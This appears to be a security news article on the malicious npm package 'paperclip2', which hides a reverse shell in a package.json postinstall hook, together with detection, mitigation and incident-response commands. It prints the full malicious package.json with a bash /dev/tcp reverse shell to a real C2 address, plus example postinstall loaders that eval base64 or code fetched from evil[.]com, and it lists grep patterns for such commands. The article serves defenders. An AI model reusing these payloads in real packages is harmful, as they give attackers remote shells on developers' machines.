
Introduction:
The npm ecosystem has long been a cornerstone of modern JavaScript development, but its convenience comes with a dark side that many developers overlook. A recently discovered malicious package, “paperclip2,” demonstrates a terrifyingly simple yet devastating attack vector: a reverse shell payload hidden entirely within a package.json file, with no JavaScript files whatsoever. This attack exploits npm’s postinstall lifecycle hook—a feature that automatically executes scripts immediately after package installation—to compromise systems with nothing more than a one-line command. What makes this particularly insidious is that traditional malware scanners focus on analyzing JavaScript files for malicious code, completely missing the payload concealed in plain sight within the configuration file.
Learning Objectives:
- Understand how npm’s postinstall lifecycle hooks can be weaponized to execute arbitrary commands without any JavaScript files
- Learn to detect and mitigate malicious packages that hide payloads exclusively in package.json
- Master practical commands and techniques for auditing dependencies, inspecting package.json files, and identifying suspicious postinstall scripts
- Develop a comprehensive defense strategy against supply chain attacks targeting the npm ecosystem
You Should Know:
1. The Anatomy of a Configuration-Only Attack
The paperclip2 package represents a paradigm shift in how attackers think about evading detection. By containing only a package.json file and no executable JavaScript, the package bypasses security scanners that are trained to look for malicious code in .js files. The postinstall script within package.json contains a one-liner that connects to a command-and-control server at 185[.]112[.]147[.]174 on port 7007 and spawns a reverse shell. When a developer runs npm install paperclip2, the package installs and immediately executes the postinstall script, granting the attacker remote access to the victim’s machine with the privileges of the user running the command.
Two related packages—vps-maintenance and vps-maintenance-paperclip-adapter—carry the identical reverse shell payload. Combined, these three packages have been downloaded 1,049 times per week, demonstrating how quickly such threats can propagate through the ecosystem.
Step-by-Step Guide: Detecting Configuration-Only Malware
Before installing any npm package, you should inspect its package.json for suspicious postinstall scripts. Here’s how:
Linux/macOS:
# View the postinstall script without downloading the package
npm view paperclip2 scripts.postinstall
# Or inspect the package.json directly after download (but before install)
npm pack paperclip2 && tar -xzf *.tgz && grep -A5 -B5 "postinstall" package/package.json
# Check for suspicious patterns in the extracted package.json
grep -iE "eval|Function|base64|https://|curl|wget|exec|import" package/package.json
Windows (PowerShell):
# View package metadata
npm view paperclip2 scripts.postinstall
# Extract and inspect
npm pack paperclip2
tar -xzf (Get-Item *.tgz).Name
Get-Content package\package.json | Select-String -Pattern "postinstall" -Context 2,5
2. The Postinstall Execution Mechanism Unmasked
npm’s lifecycle scripts are a legitimate feature designed to automate tasks like compilation and dependency management. However, attackers have weaponized this functionality. The postinstall script executes automatically and silently after package installation, often before developers have a chance to review the code. This creates a zero-click infection vector—simply running `npm install` on a malicious package is enough to compromise your system.
The paperclip2 attack demonstrates an especially dangerous variant because there is no JavaScript file to analyze. The entire payload lives in the package.json “scripts” section:
{
  "name": "paperclip2",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node -e \"require('child_process').exec('bash -i >& /dev/tcp/185.112.147.174/7007 0>&1')\""
  }
}
This one-liner uses Node.js’s child_process module to execute a bash reverse shell command, connecting back to the attacker’s server.
Step-by-Step Guide: Understanding and Analyzing Postinstall Payloads
To fully understand what a postinstall script does, you need to decode and analyze it:
Decode Base64-encoded payloads:
# If the postinstall contains base64-encoded data
echo "dmFyIH...base64 string..." | base64 -d
# For Node.js eval with base64
node -e "console.log(Buffer.from('base64string','base64').toString())"
Trace network connections from postinstall scripts:
# Monitor network connections during npm install (Linux)
sudo tcpdump -i any -n port 7007
# Or use netstat to check for suspicious connections after install
netstat -tunap | grep 7007
Windows:
# Monitor for connections to known malicious IPs
netstat -ano | findstr "7007"
# Then find the process
tasklist | findstr <PID>
3. The Supply Chain Blind Spot: What Scanners Miss
Traditional malware detection relies on signature-based scanning and behavioral analysis of executable files. The paperclip2 attack exposes a critical vulnerability in this approach: security tools that only scan JavaScript files for malicious patterns will completely miss the threat. The absence of any JavaScript files appears designed specifically to evade malware scanners that look for executable code rather than configuration files.
This blind spot is not limited to npm. Similar attacks have been observed in other ecosystems, including PyPI and RubyGems, where package metadata and setup scripts can be used to execute arbitrary code. The attack vector exploits a fundamental trust assumption: that package.json files are configuration, not code.
Step-by-Step Guide: Building a Defense-in-Depth Strategy
Implementing npm security best practices:
- Use the `--ignore-scripts` flag when installing packages in CI/CD or when you don’t trust the source:
npm install --ignore-scripts
- Configure npm to ignore scripts globally (use with caution):
npm config set ignore-scripts true
- Audit your dependencies regularly:
npm audit
npm audit fix
- Use package-lock.json to ensure consistent installations and review changes:
git diff package-lock.json
- Implement a private npm registry that vets packages before they reach your developers.
- Use runtime protection tools that monitor for unexpected network connections and process spawns during installation.
4. The Broader Campaign: npm Supply Chain Attacks in 2026
The paperclip2 package is not an isolated incident. In October 2023, Phylum’s automated risk detection platform identified a campaign involving at least 48 malicious npm publications that used similar postinstall hooks to deploy reverse shells. These packages, deceptively named to appear legitimate, contained obfuscated JavaScript designed to initiate reverse shells on package install.
More recently, in April 2026, a coordinated campaign involving 36 malicious npm packages disguised as Strapi CMS plugins was uncovered. These attacks went beyond simple reverse shells—they weaponized locally accessible Redis instances to inject malicious cron jobs, spawned multiple reverse shells on port 4444, and used mknod and dd to create raw device nodes that bypassed standard filesystem permissions to scrape sensitive data like SSH private keys and database files.
The pattern is clear: attackers are increasingly exploiting npm’s lifecycle hooks as a reliable entry point for supply chain compromises.
Step-by-Step Guide: Incident Response for Compromised npm Packages
If you suspect your system has been compromised by a malicious npm package:
Immediate Actions (Linux/macOS):
1. Identify and kill suspicious processes using the C2 port
sudo lsof -i :7007
sudo kill -9 <PID>
2. Check for reverse shell processes
ps aux | grep -E "bash.*/dev/tcp|nc.*-e|sh.*-i"
3. Remove the affected packages
npm uninstall paperclip2 vps-maintenance vps-maintenance-paperclip-adapter
4. Manually inspect and clean package.json and lock files
grep -E "paperclip2|vps-maintenance" package.json package-lock.json
# Remove any references found
5. Check for persistence mechanisms (cron, systemd, etc.)
crontab -l
ls -la /etc/cron.d/
systemctl list-units --type=service --all | grep -i suspicious
6. Check for modified or new files in the last 24 hours
find / -mtime -1 -type f 2>/dev/null | grep -vE "^/proc|^/sys|^/dev"
Windows (PowerShell – Admin):
1. Find processes using port 7007
# The reverse shell connects outbound, so 7007 is the remote port of the connection
Get-NetTCPConnection -RemotePort 7007 | Select-Object OwningProcess, RemoteAddress, State
Stop-Process -Id <PID> -Force
2. Remove packages
npm uninstall paperclip2 vps-maintenance vps-maintenance-paperclip-adapter
3. Scan for malicious entries
Select-String -Path .\package.json -Pattern "paperclip2|vps-maintenance"
4. Check for scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskName -match "suspicious"}
5. Advanced Evasion Techniques: Beyond Simple One-Liners
While paperclip2 uses a straightforward reverse shell command, attackers have developed increasingly sophisticated evasion techniques:
- Base64 Encoding with eval: The most common method combines base64 encoding with eval or the Function constructor:
"postinstall": "node -e \"eval(Buffer.from('dmFyIH...','base64').toString())\""
This makes the payload invisible when viewing the package.json on npmjs.com.
- Dynamic Payload Retrieval: The package itself contains no malicious code; instead, it downloads the payload from an attacker-controlled server during installation:
"postinstall": "node -e \"require('https').get('https://evil[.]com/p', r=>r.on('data',d=>eval(d)))\""
- Multi-Stage Obfuscation: Using dead code segments, string concatenation, variable renaming with dictionaries, and control-flow flattening to obscure the true purpose of the script.
- Git Hook Exploitation: Hiding payloads in Git hooks that are triggered later, making detection even more difficult.
Step-by-Step Guide: Advanced Detection Techniques
Automated postinstall scanning script (Linux/macOS):
#!/bin/bash
# scan-npm-packages.sh - Scan all installed npm packages for suspicious postinstall scripts
shopt -s nullglob
# Cover both plain and @scoped packages
for pkgjson in node_modules/*/package.json node_modules/@*/*/package.json; do
  package=${pkgjson#node_modules/}
  package=${package%/package.json}
  postinstall=$(grep -i "postinstall" "$pkgjson" | grep -v '^\s*//')
  if [ -n "$postinstall" ]; then
    echo "⚠️ Suspicious postinstall found in: $package"
    echo "$postinstall"
    # Check for dangerous patterns
    echo "$postinstall" | grep -iE "eval|base64|https://|curl|wget|exec|child_process|net.connect" && echo " 🔴 HIGH RISK!"
  fi
done
Using npm audit with custom rules:
Generate a detailed report
npm audit --json > audit-report.json
Parse for packages with scripts
jq '.advisories[] | select(.findings[].paths[] | contains("postinstall"))' audit-report.json
What Undercode Say:
- Key Takeaway 1: The paperclip2 package proves that malware scanners must evolve beyond analyzing only JavaScript files. Configuration files like package.json are equally dangerous attack vectors that can execute arbitrary code with zero JavaScript present. Security tools need to treat all package metadata as potentially executable content.
- Key Takeaway 2: The postinstall lifecycle hook is npm’s most dangerous feature from a security perspective. While legitimate packages use it for valid purposes, it provides attackers with a reliable, silent execution mechanism that runs with the user’s full privileges. Organizations should consider using `--ignore-scripts` in CI/CD pipelines and untrusted environments.
Prediction:
- The npm ecosystem will continue to be a prime target for supply chain attacks, with attackers increasingly focusing on configuration-only payloads that evade traditional detection. We can expect to see a significant rise in “fileless” npm malware that exists only in package.json metadata.
- The paperclip2 attack represents a warning shot—as more attackers adopt configuration-only techniques, the window between package publication and detection will shrink dramatically. Organizations that rely solely on reactive security measures will struggle to keep pace.
- This incident will accelerate the development of next-generation software composition analysis (SCA) tools that treat all package artifacts, including configuration files, as executable content. Machine learning models that analyze package.json patterns for anomalies will become standard.
- The three packages (paperclip2, vps-maintenance, vps-maintenance-paperclip-adapter) with 1,049 weekly downloads have likely already compromised numerous development environments and CI/CD pipelines. The full scope of the damage may take months to uncover.
- As attackers refine their techniques, we will see more sophisticated obfuscation within package.json, including multi-stage payloads that use base64 encoding, dynamic retrieval from C2 servers, and Git hook exploitation to maintain persistence. Traditional security awareness training will be insufficient to counter these threats.
Reported By: Hexploit Did – Hackers Feeds